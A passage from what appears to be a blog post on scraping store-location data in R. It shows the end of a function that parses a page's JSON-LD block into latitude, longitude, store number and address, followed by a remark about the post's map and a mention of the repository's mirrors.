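    html_element("script[type='application/ld+json']") |>
    html_text()

  fromJSON(raw_json, simplifyVector = FALSE)
  # among other things, this holds latitude, longitude, store number, address
}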

The map at the top of the post is just there for kicks.

The repo is also mirrored to my GitHub (sub out ‘hub’ for ‘lab’ in the URL) if you really need to bow down to Microsoft.